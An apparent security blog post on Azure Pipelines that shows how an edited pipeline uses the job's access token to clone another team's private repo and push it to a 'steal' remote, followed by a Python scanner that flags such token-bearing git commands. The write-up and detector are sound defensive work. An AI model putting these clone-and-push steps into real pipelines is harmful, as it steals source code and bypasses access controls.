
We’re back with another Let’s Hack a Pipeline. Last time, we saw how to create – and prevent – argument injection. Welcome to Episode II: Stealing Another Repo. In this episode, we’ll look at how a malicious user could access source code they shouldn’t see. (Episode III is now available, too!)

As I said before: security is a shared responsibility. The purpose of this series is to showcase some pitfalls to help you avoid them. I can’t possibly cover every single angle, and examples have been simplified to make the point.

In a large company, there are probably some code repos I’m not allowed to see. Even inside Microsoft, which has a pretty open culture, someone from Game Studio A usually can’t see what Game Studio B is working on.

Let’s say we’ve got two team projects inside one Azure DevOps organization. Each of those projects has one or more Git repos. The fabrikam-game-studios organization has these objects:

And let’s say I’m on the Popular FPS Game team, which has a daily CI pipeline for our upcoming release, “Popular FPS Game: Sequel”. I’m really curious what my colleagues on Beautiful Racing Game are working on. But I don’t have access to their source code. No problem, I’ll ask Azure Pipelines to get it for me.

When a pipeline is assigned to an agent, that agent needs to be able to fetch the source code. I create a new branch in popular-fps-game-sequel and edit the pipeline:

# sequel-ci.yml, edited
git clone -c http.extraheader="AUTHORIZATION: bearer $(System.AccessToken)" beautiful-racing-game
git remote add steal <URL of the empty stolen-source repo>
git push -c http.extraheader="AUTHORIZATION: bearer $(System.AccessToken)" -u steal --all

By queuing that pipeline (and creating an empty repo at stolen-source), I can peruse their code without restriction.
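The edited pipeline above works because a script step can hand the job’s own token to git through http.extraheader. As an added, defender-side example that is not from the original post or from Azure Pipelines itself, here is a small Python scanner a reviewer could run over pipeline YAML to flag git commands that carry $(System.AccessToken) in an extra header, either written inline or passed through an env mapping. The sample pipeline text, the Finding class and the function names are constructed for this example.

```python
import re
from dataclasses import dataclass

# Constructed sample pipeline (not the post's sequel-ci.yml): a normal build,
# a step that borrows the job token to clone and push elsewhere, a step that
# passes the token through an env mapping, and a harmless git describe.
SAMPLE_PIPELINE = """\
trigger:
- main
steps:
- script: dotnet build
  displayName: Build
- script: |
    git clone -c http.extraheader="AUTHORIZATION: bearer $(System.AccessToken)" beautiful-racing-game
    git remote add steal https://example.invalid/stolen-source
    git push -c http.extraheader="AUTHORIZATION: bearer $(System.AccessToken)" -u steal --all
  displayName: Totally normal build step
- script: git fetch -c http.extraheader="AUTHORIZATION: bearer $SYSTEM_ACCESSTOKEN" origin
  env:
    SYSTEM_ACCESSTOKEN: $(System.AccessToken)
- script: git describe --tags
  displayName: Version stamp
"""

# The predefined variable that exposes the job's OAuth token to scripts.
TOKEN_RE = re.compile(r"\$\(\s*System\.AccessToken\s*\)", re.IGNORECASE)
EXTRAHEADER_RE = re.compile(r"http\.extraheader", re.IGNORECASE)
GIT_CMD_RE = re.compile(r"\bgit\s+(clone|fetch|pull|push|ls-remote|remote)\b", re.IGNORECASE)
# 'NAME: $(System.AccessToken)' under an env: block maps the token into a shell variable.
ENV_MAP_RE = re.compile(
    r"^\s*([A-Za-z_][A-Za-z0-9_]*)\s*:\s*\$\(\s*System\.AccessToken\s*\)\s*$", re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    line_no: int          # 1-based line in the YAML text
    git_subcommand: str   # clone, fetch, push, ...
    text: str             # the offending line, stripped


def _token_env_names(lines):
    """Collect env variable names that are assigned $(System.AccessToken)."""
    names = set()
    for line in lines:
        m = ENV_MAP_RE.match(line)
        if m:
            names.add(m.group(1))
    return names


def _carries_token(line, env_names):
    """True if the line references the token directly or via a mapped env var."""
    if TOKEN_RE.search(line):
        return True
    for name in env_names:
        # $NAME or ${NAME} (bash), %NAME% (cmd)
        pattern = r"\$\{?%s\}?|%%%s%%" % (re.escape(name), re.escape(name))
        if re.search(pattern, line):
            return True
    return False


def scan_pipeline(yaml_text):
    """Return git commands that send the job token as an HTTP extra header."""
    lines = yaml_text.splitlines()
    env_names = _token_env_names(lines)
    findings = []
    for idx, raw in enumerate(lines, start=1):
        m = GIT_CMD_RE.search(raw)
        if m and EXTRAHEADER_RE.search(raw) and _carries_token(raw, env_names):
            findings.append(Finding(idx, m.group(1).lower(), raw.strip()))
    return findings


def pushes_with_token(findings):
    """Pushes are the ones that move code out of the job; surface them first in review."""
    return [f for f in findings if f.git_subcommand == "push"]


if __name__ == "__main__":
    for f in scan_pipeline(SAMPLE_PIPELINE):
        print(f"line {f.line_no}: git {f.git_subcommand} with job token -> {f.text}")
```

On the sample above the scanner reports the clone, the push and the env-mapped fetch, and leaves the plain `git remote add` and `git describe` alone. Not every hit is malicious (fetching from the pipeline’s own origin with the job token is a documented pattern), so the output is a review queue, not a verdict; the push finding is the one that should never pass without a second look.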
